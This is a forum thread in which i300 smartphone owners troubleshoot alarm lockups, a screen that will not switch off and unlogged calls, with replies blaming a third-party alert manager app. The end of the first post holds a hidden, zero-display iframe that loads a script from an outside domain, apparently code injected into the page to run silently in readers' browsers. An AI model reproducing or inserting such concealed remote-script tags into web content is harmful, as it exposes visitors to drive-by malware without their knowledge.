I got my i300 about 3 weeks ago and have run into three problems. I was hoping that someone might be able to let me know if these are known issues, or if I have a faulty unit.
Here's what I've encountered:
1) Twice in the last week my unit has locked on with the alarm scretching non-stop. Once in the cradle when I was doing nothing with the unit, except that a calendar alarm had gone off and I had never cleared it.
The second time I also had 2 calendar alarms that I had not cleared and a phone call came in. The system locked on and scretched, no button response. I pulled the battery (what I did the first time to stop it too) and then put it back in.
2)I received a call in the middle of a meeting and when the notification came on I turned the phone off instead of responding to it (used to do it with my old phone...would send the person directly to voicemail). Well, the screen stayed lit...for hours. I couldn't take the time to mess around with it and couldn't get it to go off (I have the auto-off set for 1 minute and it has always worked otherwise). When I turned the phone back on and cleared the message the screen went off without a problem.
3)Periodically I answer a call and it is not registered in any of the logs...as incoming or missed. Like the call never came in.
Anyone know anything about these issues? It seems to me like there's some kind of conflict between the phone OS and the Palm OS.
thanks for any help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I experienced the same type of things today. An alarm went off to remind me of something. It gave me two beeps at first as it normally did, then a long tone came on and just would not stop. I had to do a soft reset to stop it. Once the phone powered up again, it kept alarming every minute or so. I would check and the display would be on, but with no messages (no reminder, no missed calls, etc.). I had to do a soft reset again to fix it.
Since I just downloaded I300AlertMgr, I figured it was the culprit. Once my phone powered back up, I immediately unchecked the Enabled box. I also launched X-master and unchecked the alert AlertMgr. It has been 3 hours since, and I haven't had any more problems.
I guess I will have to dump the AlertMgr for now. I don't think it's working properly anyway. I let my phone go to voicemail this morning, and the alarm seemed to go off more often than it was supposed to (I had it set to remind me every 90 secs; it went off like every 30). Even when I turned the unit on and cancelled the alert notification, it still kept beeping. I finally called the voice mail and listened to the message. Unfortunately, I ended the call before I could save or erase the message. So, the alert kept beeping again. I had to call voicemail again to erase the message. That finally quieted down AlertMgr.
secondly, what you will h ave to do is uninstall any 3rd party apps you have installed.. then install one at a time.. this will let you know whats causing the problem..although its a lengthy process (especially if yu have alot of apps), thats the best way to figure out whats the issue..
you can list your 3rd party apps you have installed here for others to see so we can see if theres an app on your list that has caused someone else some issues...
the alert manager has been mentioned elsewhere also. ifyou have that installed, i suggest you email them directly andl et them know what has happened..
i doubt they are, though i cant speak for them.. thats why they should hit them up directly.. they will probably give them a fre upgrade when it comes available.. since you can try the ap for free first, i think thats the clincher for trying to get a refund...
this is one reason i dont try ti install a bunch of "hacks"...
